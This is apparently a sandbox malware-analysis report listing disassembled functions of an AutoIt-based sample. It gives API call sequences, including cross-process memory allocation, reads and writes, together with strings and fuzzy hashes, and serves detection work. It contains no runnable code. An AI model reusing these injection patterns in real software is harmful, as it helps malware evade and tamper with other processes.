Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: _memmove
String ID: 3ca$_a
API String ID: 4104443479-1000881220
Opcode ID: 5e89f71789ef3079a96b4989e8a32a88311e4b4f2989eb3ea68c097db1030c53
Instruction ID: 0ef1cc414352d3f700bc36bd06735495045b99c0a7ade4e329f0ce46aca6c1f6
Opcode Fuzzy Hash: 5e89f71789ef3079a96b4989e8a32a88311e4b4f2989eb3ea68c097db1030c53
Instruction Fuzzy Hash: 7F513B709006199FCB64CF68D880AEEBBF2FF45314F148529E85AD7350EB31A995CF51

Function 006597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00659296,?,?,00000034,00000800,?,00000034), ref: 006614E6

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0065983F

Part of subcall function 00661487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006614B1

Part of subcall function 006613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00661409
Part of subcall function 006613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0065925A,00000034,?,?,00001004,00000000,00000000), ref: 00661419
Part of subcall function 006613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0065925A,00000034,?,?,00001004,00000000,00000000), ref: 0066142F

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006598AC
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 006598F9

Strings

@, xrefs: 00659911

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 34b819b5d4d497771f6c5a512fef96c117ebce629ab933276f989d857f00016e
Instruction ID: 68c7785af9dbe4a45794aaf89e2019959b58b67def9a12f0718cd7760362f0ad
Opcode Fuzzy Hash: 34b819b5d4d497771f6c5a512fef96c117ebce629ab933276f989d857f00016e
Instruction Fuzzy Hash: AB41537690021CBFDB10DFA4CC41ADEBBB9EF06300F144159F945B7251DA716E89CBA0

Function 00687946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0068F910,00000000,?,?,?,?), ref: 006879DF
GetWindowLongW.USER32 ref: 006879FC
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00687A0C

Strings

SysTreeView32, xrefs: 006879B1

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: aa8bce48d648b84ce8cc7d2bff2800801f5994d3b2e2158be64c008d03445340
Instruction ID: 36d1e34b4f0bdcc8d8102cf0d8f44b59fa52d109ad47ce0847b3c9366365e107
Opcode Fuzzy Hash: aa8bce48d648b84ce8cc7d2bff2800801f5994d3b2e2158be64c008d03445340
Instruction Fuzzy Hash: FC31CE31204206ABDF15AF38DC45BEB77AAEF05324F204729F875A22E0D730ED919B60

Function 006873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00687461
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00687475
SendMessageW.USER32(?,00001002,00000000,?), ref: 00687499

Strings

SysMonthCal32, xrefs: 0068742C

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: bce9470168720e6bfbb459c058ebc21251cf224f5a6410dbc69692e97d7aa257
Instruction ID: 8dfff141c00aea3f8a63f388e5b761437d17464420e10065faeca8c8ac249fc0
Opcode Fuzzy Hash: bce9470168720e6bfbb459c058ebc21251cf224f5a6410dbc69692e97d7aa257
Instruction Fuzzy Hash: D8219132540218BBDF15DF94DC46FEA3BAAEF48724F210214FE156B1D0DA75EC919BA0

Function 00686CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00686D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00686D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00686D70

Strings

Listbox, xrefs: 00686D08

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: a8a3c1c2c787b4954c886ffa1b003fe8101b283c0ad4c9b205ca97f1501021b5
Instruction ID: 58a9ae53e6e1bf3e76739ae48566f0a8e495b52c0c1b7fd56ad3d17f1cbce158
Opcode Fuzzy Hash: a8a3c1c2c787b4954c886ffa1b003fe8101b283c0ad4c9b205ca97f1501021b5
Instruction Fuzzy Hash: FE218032650118BFDF129F54DC45EEB3BBBEF89750F118228FA459B2A0C671AC5187A0

Function 006739E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00673A66

Part of subcall function 00607DE1: _memmove.LIBCMT ref: 00607E22

Strings

, $, xrefs: 00673AA6
%i, xrefs: 006739F4
AUTOITCALLVARIABLE%d, xrefs: 00673A58

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%i
API String ID: 3506404897-3841533268
Opcode ID: 914b4d1b13d9ea5eb65089ff36722a3af6a902451aa6473dc873eae9ed776da2
Instruction ID: cdfa73a88187a52db760ea11007a93ba090570a584acbe1a9dcd3d2445faedae
Opcode Fuzzy Hash: 914b4d1b13d9ea5eb65089ff36722a3af6a902451aa6473dc873eae9ed776da2
Instruction Fuzzy Hash: 6F219870640219AFCF54EF54CC42AEE77BBAF44300F504458F449A7281DB30EA45DB65

Function 0068770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00687772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00687787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00687794

Strings

msctls_trackbar32, xrefs: 00687749

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 7ec0fb68df0f9fba8355d75e44c7ec791f132314638a0e30697f8ed04e5c22ec
Instruction ID: c3fb757a7b1103d03ac10a5353c4b65d87f833d1f1c09de948634cd772fd20b5
Opcode Fuzzy Hash: 7ec0fb68df0f9fba8355d75e44c7ec791f132314638a0e30697f8ed04e5c22ec
Instruction Fuzzy Hash: F811E772244208BAEF146F65CC05FEB776AEF89B54F114218F641A61D0D671E851CB20

Function 00626B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00626B93
__calloc_crt.LIBCMT ref: 00626BAC

Strings

k, xrefs: 00626BD1
@Bl, xrefs: 00626BC3

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: __calloc_crt
String ID: k$@Bl
API String ID: 3494438863-2030202147
Opcode ID: 8c5d853f41c4a0784f8da3b0a3c18c920f89c87a7c8892042526b7b81cff0e60
Instruction ID: 0606359a703258cbbc2d70fc503c3c4ecb42998c5aa4759c084187ddf372f8c3
Opcode Fuzzy Hash: 8c5d853f41c4a0784f8da3b0a3c18c920f89c87a7c8892042526b7b81cff0e60
Instruction Fuzzy Hash: D4F04F71209E228FE7649F68FC51EA66BD7E710770F50141AF502CF290EB74A9D18BC4

Function 00629B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 00629B94

Part of subcall function 00629C0B: __mtinitlocknum.LIBCMT ref: 00629C1D
Part of subcall function 00629C0B: EnterCriticalSection.KERNEL32(00000000,?,00629A7C,0000000D), ref: 00629C36

__updatetlocinfoEx_nolock.LIBCMT ref: 00629BA4

Part of subcall function 00629100: ___addlocaleref.LIBCMT ref: 0062911C
Part of subcall function 00629100: ___removelocaleref.LIBCMT ref: 00629127
Part of subcall function 00629100: ___freetlocinfo.LIBCMT ref: 0062913B

Strings

8k, xrefs: 00629B8A, 00629B9F, 00629BAB
8k, xrefs: 00629B85

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
String ID: 8k$8k
API String ID: 547918592-2854333805
Opcode ID: 4fddad08e44fd6b19cb8ae66126cf41794be66e5198bd039f66e3a7e771b1a26
Instruction ID: 84cd6b08aca6446b93844559a48c514dc5e67aa61b40db05c43c5d3e90df8e35
Opcode Fuzzy Hash: 4fddad08e44fd6b19cb8ae66126cf41794be66e5198bd039f66e3a7e771b1a26
Instruction Fuzzy Hash: 68E08CB1943B20ABEBA4BBA87E07BC926639B80B22F20125EF055560C1CD7104C08E2F

Function 00604C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00604B83,?), ref: 00604C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00604C56

Strings

Wow64RevertWow64FsRedirection, xrefs: 00604C50
kernel32.dll, xrefs: 00604C3F

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 107aaedabc6072b961b8bc5e9aaa1277de6979cb9f28a79764b8f37eaf159cf6
Instruction ID: c6519d7a7ea1d66f8f7076ae7da922a312cf93c070ae6cb72b1cb9fdbb3151ff
Opcode Fuzzy Hash: 107aaedabc6072b961b8bc5e9aaa1277de6979cb9f28a79764b8f37eaf159cf6
Instruction Fuzzy Hash: 67D0C7B0600713DFE7349F31C80828A72E6AF00351B12883E95D2D62A0EA70C8C0CB20

Function 00604C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00604BD0,?,00604DEF,?,006C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00604C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00604C23

Strings

kernel32.dll, xrefs: 00604C0C
Wow64DisableWow64FsRedirection, xrefs: 00604C1D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 337abe39cfaa19464ae581b1546223c74f76c5a8dad699b87a0f7f7d03338640
Instruction ID: 2a2c75e182bdff9088ba68e4fe986e9de8351d06342402d2c9de8886ceef9fd9
Opcode Fuzzy Hash: 337abe39cfaa19464ae581b1546223c74f76c5a8dad699b87a0f7f7d03338640
Instruction Fuzzy Hash: 99D0EC71551712DFD7206F71D90868BB6D7AF09752B1199399486D6290EAB0D8808750

Function 00680DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00681039), ref: 00680DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00680E07

Strings

RegDeleteKeyExW, xrefs: 00680E01
advapi32.dll, xrefs: 00680DF0

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 9ac1046dc28fa6b1d3a71984f3bec10702de9cc8d81cd37abaa9cf7ddcaafcad
Instruction ID: 9a69a93353b2f178fde71b88dd246463c29e33ebc3425490e4e4ea89008eca1c
Opcode Fuzzy Hash: 9ac1046dc28fa6b1d3a71984f3bec10702de9cc8d81cd37abaa9cf7ddcaafcad
Instruction Fuzzy Hash: 92D0E2B1550722DFE720AF75C80C6C776E6AF04752F129D2E9586D2250EAB0D8948B60

Function 006790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00678CF4,?,0068F910), ref: 006790EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00679100

Strings

kernel32.dll, xrefs: 006790E9
GetModuleHandleExW, xrefs: 006790FA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: a0a3fe70dc5e8f76db8b8d0c62624ccc4d1a604e4b5ccb8b59f78ff96b8ca3d0
Instruction ID: 643e0cb89ff2b79f36ccf32bce27b02867af40ffacfac7e8d72fcf4d322831e8
Opcode Fuzzy Hash: a0a3fe70dc5e8f76db8b8d0c62624ccc4d1a604e4b5ccb8b59f78ff96b8ca3d0
Instruction Fuzzy Hash: C8D01274560713DFD7209F35D81C64676DAAF05751B52C93994C5D6650EA70C4D0C760

Function 00641714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00641718
__swprintf.LIBCMT ref: 00641749

Strings

WIN_XPe, xrefs: 00641788
%.3d, xrefs: 00641723

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 2af1eecd1241cd247f86ba4f6c99a86e5691a3cd6a07459e6a6b6b025e6508cc
Instruction ID: ec9c36159c74691666c3b750eb409d581c95ba165344c170fa17cc9f5f589431
Opcode Fuzzy Hash: 2af1eecd1241cd247f86ba4f6c99a86e5691a3cd6a07459e6a6b6b025e6508cc
Instruction Fuzzy Hash: 7BD017B1844118FACB54AB9098888FA737EEB0A311F200562B512A6080E2269BD6EB25

Function 0065717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
Instruction ID: 67e3774072df05e8cc1e11ff5e48736c2f2ced4932e346568cb723b686c33a36
Opcode Fuzzy Hash: e4ef2cd05f147fedc889e15fa147ef0967b083d26cee3ea4d175a4b81814ca5d
Instruction Fuzzy Hash: 6DC14874A04216AFCB14CFA4D884AAEBBF6FF48715F148598EC05EB251D730EE85DB90

Function 0067E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0067E0BE
CharLowerBuffW.USER32(?,?), ref: 0067E101

Part of subcall function 0067D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0067D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0067E301
_memmove.LIBCMT ref: 0067E314

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: c3d27c6f2c51794a5072e3b4fd7bab2aa48ec106d76a15d1e41450fe77d8b1a6
Instruction ID: d65e7e619850323f24eaeca3e7d87f6e3efd854b2019b9407fff94672138222f
Opcode Fuzzy Hash: c3d27c6f2c51794a5072e3b4fd7bab2aa48ec106d76a15d1e41450fe77d8b1a6
Instruction Fuzzy Hash: 13C14871A083019FC744DF28C48196ABBE6FF89714F14896EF8999B352D731E94ACF81

Function 00678093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006780C3
CoUninitialize.OLE32 ref: 006780CE

Part of subcall function 0065D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065D5D4

VariantInit.OLEAUT32(?), ref: 006780D9
VariantClear.OLEAUT32(?), ref: 006783AA

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: c19a890bd0353fb9cb2d8061d9ec287de62af79219a67dd536b79c8565348aac
Instruction ID: 943fec30a074ce9ba93e71e0c43ba829975e661763329b6c94c476b86b7dbaf0
Opcode Fuzzy Hash: c19a890bd0353fb9cb2d8061d9ec287de62af79219a67dd536b79c8565348aac
Instruction Fuzzy Hash: 72A19B752447019FCB44DF64C485B2AB7E6BF89324F04894CF99A9B3A2CB30ED05CB96

Function 0065687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0065688E
SysAllocString.OLEAUT32(00000000), ref: 00656937
VariantCopy.OLEAUT32 ref: 00656966
VariantClear.OLEAUT32(?), ref: 0065698D

Memory Dump Source

Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true

Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd

Similarity

